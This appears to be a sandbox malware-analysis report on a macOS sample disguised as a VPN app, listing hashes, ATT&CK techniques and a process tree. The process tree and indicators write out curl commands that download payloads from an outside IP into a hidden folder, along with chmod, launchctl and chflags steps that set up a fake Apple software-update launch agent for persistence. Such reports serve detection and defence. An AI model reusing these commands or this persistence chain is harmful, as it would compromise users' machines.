Overview
overview
10Static
static
10Covid/covid
windows11-21h2-x64
1Covid/covid
macos-10.15-amd64
1Covid/softwareupdated
windows11-21h2-x64
1Covid/softwareupdated
macos-10.15-amd64
1Covid/vpn.dmg
windows11-21h2-x64
3Covid/vpn.dmg
macos-10.15-amd64
7vpn.app/Co...OS/vpn
windows11-21h2-x64
1vpn.app/Co...OS/vpn
macos-10.15-amd64
7vpn.app/Co...script
windows11-21h2-x64
1vpn.app/Co...script
macos-10.15-amd64
7Resubmissions
07-11-2024 18:36
241107-w9c14sxcjh 10Analysis
-
max time kernel
77s -
max time network
147s -
platform
macos-10.15_amd64 -
resource
macos-20241106-en -
resource tags
arch:amd64arch:i386image:macos-20241106-enkernel:19b77alocale:en-usos:macos-10.15-amd64system -
submitted
07-11-2024 18:36
Behavioral task
behavioral1
Sample
Covid/covid
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
Covid/covid
Resource
macos-20241101-en
Behavioral task
behavioral3
Sample
Covid/softwareupdated
Resource
win11-20241007-en
Behavioral task
behavioral4
Sample
Covid/softwareupdated
Resource
macos-20241106-en
Behavioral task
behavioral5
Sample
Covid/vpn.dmg
Resource
win11-20241007-en
Behavioral task
behavioral6
Sample
Covid/vpn.dmg
Resource
macos-20241101-en
Behavioral task
behavioral7
Sample
vpn.app/Contents/MacOS/vpn
Resource
win11-20241007-en
Behavioral task
behavioral8
Sample
vpn.app/Contents/MacOS/vpn
Resource
macos-20241106-en
Behavioral task
behavioral9
Sample
vpn.app/Contents/Resources/script
Resource
win11-20241007-en
Behavioral task
behavioral10
Sample
vpn.app/Contents/Resources/script
Resource
macos-20241106-en
General
-
Target
vpn.app/Contents/MacOS/vpn
-
Size
106KB
-
MD5
6d6ee4e9054cd7886902cf5a4ed215fd
-
SHA1
b486104d58bd9e267ab761bfdaa7955942bebcb8
-
SHA256
6f551940380e2a4d4db3c9b25e85ef9d3c7628dbb60994b0ec066024cd355d45
-
SHA512
972a26cd02f96fccd71151cac3fa51afc1c72d89f51886b01e19022f978e6322cda601eb68085b2a35d1a8d600f7b225f65f5e37ef5b340c7ab3baf0d7eac888
-
SSDEEP
1536:EI3I09nvBbpIBBRVOAUOaT1CYjLxdC1hngLLFTAI+uIMRDdcC:El0FvB6BRVGOteHC1hngLLFsI+LMRL
Malware Config
Signatures
-
Exfiltration Over Alternative Protocol 1 TTPs 2 IoCs
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
ioc Process curl -L http://46.137.201.254/covid -o /Users/run/covid Process not Found curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated Process not Found -
Launch Agent 1 TTPs
Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.
-
Resource Forking 1 TTPs 1 IoCs
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.
ioc Process /bin/bash /Users/run/vpn.app/Contents/Resources/script Process not Found -
Launchctl 1 TTPs 2 IoCs
Adversaries may abuse launchctl to execute commands or programs. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.
ioc Process launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist Process not Found launchctl start softwareupdated Process not Found
Processes
-
/bin/shsh -c "sudo /bin/zsh -c \"/Users/run/vpn.app/Contents/MacOS/vpn\""1⤵PID:452
-
/bin/bashsh -c "sudo /bin/zsh -c \"/Users/run/vpn.app/Contents/MacOS/vpn\""1⤵PID:452
-
/usr/bin/sudosudo /bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn1⤵PID:452
-
/bin/zsh/bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn2⤵PID:453
-
-
/Users/run/vpn.app/Contents/MacOS/vpn/Users/run/vpn.app/Contents/MacOS/vpn2⤵PID:453
-
-
/bin/bash/bin/bash /Users/run/vpn.app/Contents/Resources/script1⤵PID:477
-
/usr/bin/unameuname -m2⤵PID:478
-
-
/bin/mkdirmkdir /Users/run/.androids2⤵PID:479
-
-
/usr/bin/curlcurl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated2⤵PID:480
-
-
/bin/chmodchmod a+x /Users/run/.androids/softwareupdated2⤵PID:502
-
-
/bin/chmodchmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist2⤵PID:503
-
-
/bin/launchctllaunchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist2⤵PID:504
-
-
/bin/launchctllaunchctl start softwareupdated2⤵PID:506
-
-
/Users/run/.androids/softwareupdated/Users/run/.androids/softwareupdated2⤵PID:507
-
-
/usr/bin/chflagschflags uchg /Users/run/.androids/softwareupdated2⤵PID:508
-
-
/usr/bin/curlcurl -L http://46.137.201.254/covid -o /Users/run/covid2⤵PID:509
-
-
/usr/libexec/xpcproxyxpcproxy com.apple.nsurlstoraged1⤵PID:484
-
/usr/libexec/nsurlstoraged/usr/libexec/nsurlstoraged --privileged1⤵PID:484
-
/usr/libexec/xpcproxyxpcproxy softwareupdated1⤵PID:505
-
/Users/run/.androids/softwareupdated/Users/run/.androids/softwareupdated -D1⤵PID:505
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD564f469698e53d0c828b7f90acd306082
SHA1bcc041b3849e1b0b4104ffeb46002207eeac54f3
SHA256d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd
SHA512a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f